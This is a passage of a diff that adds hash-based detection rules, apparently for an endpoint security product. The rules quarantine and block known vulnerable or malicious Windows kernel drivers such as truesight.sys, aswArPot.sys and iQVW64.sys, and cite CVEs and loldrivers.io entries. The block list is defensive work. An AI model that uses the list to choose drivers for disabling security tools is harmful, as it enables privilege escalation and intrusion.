+ "value": "5874e47ef681bc7cd86df905751fd0f692eed11b6a30fa68df592806316f9bc2",
+ "comment": "Vulnerable Kernel Driver (aka b3.sys) [https://www.loldrivers.io/drivers/adfb015a-f453-4b9e-a247-50f146209eb0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33352fc7-d4ee-5b3e-888e-c30627d5cf97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834726Z",
+ "creation_date": "2026-03-23T11:45:30.834729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834739Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cde0a6cb79c9e87e1d5cd0b2da48df3e8ac007dde81589417ae52017db7f4dd9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3347bb5e-80e3-5f9d-b324-d4ad07cfe595",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458579Z",
+ "creation_date": "2026-03-23T11:45:30.458582Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5271f526b19331c7f8526a5e10b9aedc0ddd325958aa0e908ceaee40692f7ae2",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "336253a1-b634-57f8-b922-8e35db358ad4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457902Z",
+ "creation_date": "2026-03-23T11:45:30.457905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457913Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14938f68957ede6e2b742a550042119a8fbc9f14427fb89fa53fff12d243561c",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33690441-6e78-5490-a5c7-347f31939b4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979846Z",
+ "creation_date": "2026-03-23T11:45:29.979848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79",
+ "comment": "Vulnerable Kernel Driver (aka t8.sys) [https://www.loldrivers.io/drivers/8c2fa9d1-b2b1-4ba1-bad9-60c44c2c20eb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "336f8934-75d6-53fa-b230-6f9b52fb4f2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823034Z",
+ "creation_date": "2026-03-23T11:45:30.823036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823041Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8001d7161d662a6f4afb4d17823144e042fd24696d8904380d48065209f28258",
+ "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33774780-26d8-53e8-90f8-8cb91c900ea0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969435Z",
+ "creation_date": "2026-03-23T11:45:29.969437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969443Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5183eda50e2c42d2ed10c015be87dff774da180928c076e99888b0d6a931df5",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "337bb937-0924-5eee-816d-162f323cd0ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816116Z",
+ "creation_date": "2026-03-23T11:45:31.816119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a70f2302cea9903b3f90ff5c89c3b91efea09798bd8205650d3023def1a88ae6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "337cc11d-bd5b-55e8-9860-70e4837a051e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457994Z",
+ "creation_date": "2026-03-23T11:45:30.457997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458005Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53810ca98e07a567bb082628d95d796f14c218762cbbaa79704740284dccda4b",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3386d7de-4380-535b-838c-95ef6f7b7108",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972107Z",
+ "creation_date": "2026-03-23T11:45:29.972109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d74755311d127d0eb7454e56babc2db8dbaa814bc4ba8e2a7754d3e0224778e1",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33883177-ec4f-5290-a383-97f2258e163f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146062Z",
+ "creation_date": "2026-03-23T11:45:32.146065Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146070Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85ca0dcdc52709de21281b8fc131a58440a045cf640643a6d96e5fee13a78b81",
+ "comment": "Malicious Kernel Driver (aka driver_85ca0dcd.sys) [https://www.loldrivers.io/drivers/e1c29414-5b5b-44f4-84cc-e6f55d9a23c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "338a3b19-4b6c-5fc8-b199-42d1ecf700d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500257Z",
+ "creation_date": "2026-03-23T11:45:31.500260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74c0a7245bdaeb9bd4caef2f87e85097ea5964e7a62e5f5fc7a929f4afbcd5cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "338b240c-6a87-5ea9-841f-f0da16e5e201",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471831Z",
+ "creation_date": "2026-03-23T11:45:30.471834Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68671b735716ffc168addc052c5dc3d635e63e71c1e78815e7874286c3fcc248",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "338c1220-6dcc-5557-9404-25f5baf30d72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604925Z",
+ "creation_date": "2026-03-23T11:45:29.604927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69a4d67126186f9b29d0c12004c8b4a9e22afe30942448ade6696eb8b164b88f",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "338e0b0b-9d4a-5aa6-ba5d-8f2c846d183c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495115Z",
+ "creation_date": "2026-03-23T11:45:31.495117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495122Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f59d8602f4dfd43ce7126c574ca4dc1cf39867a60971c0d993a99044f15b48e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33937be4-b007-5c88-8e8b-a893c8cdde3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477578Z",
+ "creation_date": "2026-03-23T11:45:30.477581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af16c36480d806adca881e4073dcd41acb20c35ed0b1a8f9bd4331de655036e1",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "339acd0f-f241-56e0-ac14-1572c93107c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613295Z",
+ "creation_date": "2026-03-23T11:45:29.613297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "339c419c-886b-5690-b21f-955e21beff6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833975Z",
+ "creation_date": "2026-03-23T11:45:30.833978Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b89fa8308d44e0629bc159ab14b284145fdfe7e13d6fb2a81b6a378f31c32c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33a21463-c58a-5581-9793-1abf3dfee325",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456480Z",
+ "creation_date": "2026-03-23T11:45:30.456483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456492Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8096325bfe81b093dd522095b6153d9c4850ba2eaa790e12e7056ef160d0432",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33a6a51f-10aa-5a22-a7a3-0e4d1e87c523",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493221Z",
+ "creation_date": "2026-03-23T11:45:31.493223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4c3d7c95e4ed14c7adff853e1d36d976a5e05de0f9e37a409dd79224d921392",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33a781ac-ff55-57b2-870d-0bd12217a5dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452981Z",
+ "creation_date": "2026-03-23T11:45:30.452984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e279e425d906ba77784fb5b2738913f5065a567d03abe4fd5571695d418c1c0f",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33bead4f-7b8d-51a5-b91f-ac49d23b4974",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611532Z",
+ "creation_date": "2026-03-23T11:45:29.611534Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611539Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb6807c46e2d4808f07cca9242e7a59393fdab6ccf4da1aec124ef2a34398d43",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33bf2257-58a5-5d53-9cb4-533d8d23da48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616060Z",
+ "creation_date": "2026-03-23T11:45:29.616062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33bf7a9a-62b7-5784-b666-cad9b8135193",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
